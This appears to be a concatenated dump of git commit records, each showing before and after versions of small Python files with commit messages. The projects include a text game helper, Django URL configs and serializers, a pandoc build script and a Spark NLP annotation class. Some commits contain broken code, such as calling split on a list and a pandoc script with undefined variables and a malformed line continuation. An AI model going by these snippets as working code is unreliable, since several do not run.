return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
Fix @DaVinci789's crappy spelling >:)import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
<commit_before>import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
<commit_msg>Fix @DaVinci789's crappy spelling >:)<commit_after>import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
5f73fd983caa758a77f0fd823425057bd8b36204
|
devproject/devproject/urls.py
|
devproject/devproject/urls.py
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
Fix deprecation re url patterns
|
Fix deprecation re url patterns
|
Python
|
mit
|
philgyford/django-ditto,philgyford/django-ditto,philgyford/django-ditto
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
Fix deprecation re url patterns
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
<commit_before>from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
<commit_msg>Fix deprecation re url patterns<commit_after>
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
Fix deprecation re url patternsfrom django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
<commit_before>from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
from django.conf.urls import include, patterns, url
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
<commit_msg>Fix deprecation re url patterns<commit_after>from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^flickr/', include('ditto.flickr.urls', namespace='flickr')),
url(r'^pinboard/', include('ditto.pinboard.urls', namespace='pinboard')),
url(r'^twitter/', include('ditto.twitter.urls', namespace='twitter')),
url(r'', include('ditto.core.urls', namespace='ditto')),
]
from django.conf import settings
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
|
b57a2e184e3861617c12801529295b0095257cd9
|
petition/resources.py
|
petition/resources.py
|
from import_export import resources
from .models import Signature
class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
|
from import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
Fix swappable model in signature export
|
Fix swappable model in signature export
|
Python
|
mit
|
watchdogpolska/django-one-petition,watchdogpolska/django-one-petition,watchdogpolska/django-one-petition
|
from import_export import resources
from .models import Signature
class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
Fix swappable model in signature export
|
from import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
<commit_before>from import_export import resources
from .models import Signature
class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
<commit_msg>Fix swappable model in signature export<commit_after>
|
from import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
from import_export import resources
from .models import Signature
class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
Fix swappable model in signature exportfrom import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
<commit_before>from import_export import resources
from .models import Signature
class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
<commit_msg>Fix swappable model in signature export<commit_after>from import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
8851223a1576a4e164449b589f68c0420966d622
|
PythonScript/GenerateBook.py
|
PythonScript/GenerateBook.py
|
#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
|
import subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
Implement GenerateCover using fake vars
|
Implement GenerateCover using fake vars
|
Python
|
mit
|
fan-jiang/Dujing
|
#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
Implement GenerateCover using fake vars
|
import subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
<commit_before>#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
<commit_msg>Implement GenerateCover using fake vars<commit_after>
|
import subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
Implement GenerateCover using fake varsimport subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
<commit_before>#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
<commit_msg>Implement GenerateCover using fake vars<commit_after>import subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
795d76074b0d8336ebe29b3816186732d29c0cd2
|
deployer/__init__.py
|
deployer/__init__.py
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
Update to next dev version
|
Update to next dev version
|
Python
|
mit
|
totem/cluster-deployer,totem/cluster-deployer,totem/cluster-deployer
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
Update to next dev version
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
<commit_before>from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
<commit_msg>Update to next dev version<commit_after>
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
Update to next dev versionfrom __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
<commit_before>from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
<commit_msg>Update to next dev version<commit_after>from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
2b7a703aab3e07cee82a0b1cc494dab71d7c22df
|
bin/build-scripts/write_build_time.py
|
bin/build-scripts/write_build_time.py
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
Use correct latest commit in __version__ endpoint
|
Use correct latest commit in __version__ endpoint
|
Python
|
mpl-2.0
|
mozilla-services/pageshot,mozilla-services/screenshots,mozilla-services/pageshot,mozilla-services/pageshot,mozilla-services/screenshots,mozilla-services/screenshots,mozilla-services/screenshots,mozilla-services/pageshot
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
Use correct latest commit in __version__ endpoint
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
<commit_before>#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
<commit_msg>Use correct latest commit in __version__ endpoint<commit_after>
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
Use correct latest commit in __version__ endpoint#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
<commit_before>#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
<commit_msg>Use correct latest commit in __version__ endpoint<commit_after>#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
3a57d826a957b864753895d8769dcf747d489e1b
|
administrator/serializers.py
|
administrator/serializers.py
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
Remove category serializer from subcategory serializer
|
Remove category serializer from subcategory serializer
|
Python
|
apache-2.0
|
belatrix/BackendAllStars
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
Remove category serializer from subcategory serializer
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
<commit_before>from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
<commit_msg>Remove category serializer from subcategory serializer<commit_after>
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
Remove category serializer from subcategory serializerfrom categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
<commit_before>from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
<commit_msg>Remove category serializer from subcategory serializer<commit_after>from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
0960ca60effa80ca52a715d30f9651741c3b9800
|
python/sparknlp/annotation.py
|
python/sparknlp/annotation.py
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
Fix Python dataType Annotation [skip travis]
|
Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]
|
Python
|
apache-2.0
|
JohnSnowLabs/spark-nlp,JohnSnowLabs/spark-nlp,JohnSnowLabs/spark-nlp,JohnSnowLabs/spark-nlp
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
